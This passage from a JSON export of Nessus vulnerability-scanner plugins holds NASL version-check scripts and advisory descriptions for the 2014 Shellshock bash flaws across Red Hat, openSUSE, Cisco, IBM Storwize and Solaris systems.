pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1354\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140930.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for bsc#898812, CVE-2014-6277: more troubles with functions bash-4.2-parse-exportfunc.patch for bsc#898884, CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches 
bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-595.NASL", "href": "https://www.tenable.com/plugins/nessus/78591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78591);\n script_version(\"1.17\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for\n bsc#898812, CVE-2014-6277: more troubles with functions\n bash-4.2-parse-exportfunc.patch for bsc#898884,\n CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. 
As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", 
reference:\"libreadline6-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "According to its self-reported version, the remote host is running a version of Cisco UCS Director that could be affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can be exploited.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "Cisco UCS Director Code Injection (CSCur02877) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "href": "https://www.tenable.com/plugins/nessus/78770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78770);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco UCS Director Code Injection (CSCur02877) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Bash.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is running a\nversion of Cisco UCS Director that could be affected by a command\ninjection 
vulnerability in GNU Bash known as Shellshock, which is due\nto the processing of trailing strings after function definitions in\nthe values of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can\nbe exploited.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02877\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to the version recommended in Cisco bug ID\nCSCur02877\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", 
value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nchckver = get_kb_item_or_exit(\"Host/Cisco/UCSDirector/version\");\n# Could be unknown version because the WebUI can be detected but\n# no version information could be retrieved.\nif (chckver == UNKNOWN_VER) audit(AUDIT_UNKNOWN_DEVICE_VER, \"Cisco UCS Director\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n (\n ver_compare(ver:chckver, fix:\"4.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"4.1.0.5\", strict:FALSE) <= 0\n ) ||\n (\n ver_compare(ver:chckver, fix:\"5.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"5.0.0.2\", strict:FALSE) < 0\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (chckver =~ \"^5\\.\")\n fix = '5.0.0.0 with hotfix cucsd_5_0_0_0_bash_hotfix / 5.0.0.2 / 5.1.0.0';\n else\n fix = '4.1.0.5 with hotfix cucsd_4_1_0_5_bash_hotfix';\n\n report =\n '\\n Installed version : ' + chckver +\n '\\n Fixed version (s) : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:48:47", "description": "The remote IBM Storwize V7000 Unified device is running version 1.3.x prior to 1.4.3.5 or 1.5.x prior 
to 1.5.0.4. It is, therefore, affected by the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271)\n\n - An out-of-bounds memory access error exists in GNU Bash in file parse.y due to evaluating untrusted input during stacked redirects handling. A remote attacker can exploit this, via a crafted 'here' document, to execute arbitrary code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the read_token_word() function in file parse.y when handling deeply-nested flow control constructs. A remote attacker can exploit this, by using deeply nested loops, to execute arbitrary code or cause a denial of service. (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. 
(CVE-2014-6278) Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-25T00:00:00", "type": "nessus", "title": "IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/h:ibm:storwize_unified_v7000", "cpe:/a:ibm:storwize_v7000_unified_software"], "id": "IBM_STORWIZE_1_5_0_4.NASL", "href": "https://www.tenable.com/plugins/nessus/85630", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85630);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"IBM Storwize V7000 Unified 1.3.x < 1.4.3.5 / 1.5.x < 1.5.0.4 Multiple Vulnerabilities (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IBM Storwize V7000 Unified device is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote IBM Storwize V7000 Unified device is running version 1.3.x\nprior to 1.4.3.5 or 1.5.x prior to 
1.5.0.4. It is, therefore, affected\nby the following vulnerabilities :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271)\n \n - An out-of-bounds memory access error exists in GNU Bash\n in file parse.y due to evaluating untrusted input during\n stacked redirects handling. A remote attacker can exploit\n this, via a crafted 'here' document, to execute arbitrary\n code or cause a denial of service. (CVE-2014-7186)\n\n - An off-by-one error exists in GNU Bash in the\n read_token_word() function in file parse.y when handling\n deeply-nested flow control constructs. A remote attacker\n can exploit this, by using deeply nested loops, to\n execute arbitrary code or cause a denial of service.\n (CVE-2014-7187)\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables.\n This allows a remote attacker to execute arbitrary code\n via environment variable manipulation depending on the\n configuration of the system. 
(CVE-2014-6278) Note that\n this vulnerability exists because of an incomplete fix\n for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM Storwize V7000 Unified version 1.4.3.5 / 1.5.0.4 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2015/08/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:ibm:storwize_unified_v7000\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:storwize_v7000_unified_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ibm_storwize_detect.nbin\");\n script_require_keys(\"Host/IBM/Storwize/version\", \"Host/IBM/Storwize/machine_major\", \"Host/IBM/Storwize/display_name\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/IBM/Storwize/version\");\nmachine_major = get_kb_item_or_exit(\"Host/IBM/Storwize/machine_major\");\ndisplay_name = get_kb_item_or_exit(\"Host/IBM/Storwize/display_name\");\n\nif (\n machine_major != \"2073\" # V7000 Unified\n) audit(AUDIT_DEVICE_NOT_VULN, display_name);\n\nif (version == UNKNOWN_VER || version == \"Unknown\")\n audit(AUDIT_UNKNOWN_APP_VER, display_name);\n\nif (version =~ \"^1\\.[3-4]\\.\") fix = \"1.4.3.5\";\nelse if (version =~ \"^1\\.5\\.\") fix = \"1.5.0.4\";\nelse audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_DEVICE_NOT_VULN, display_name, version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Name : ' + display_name +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(port:0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:20:18", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - GNU Bash through 
4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. 
(CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the 'word_lineno' issue. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.2", "p-cpe:/a:oracle:solaris:bash"], "id": "SOLARIS11_BASH_20141031.NASL", "href": "https://www.tenable.com/plugins/nessus/80590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80590);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n 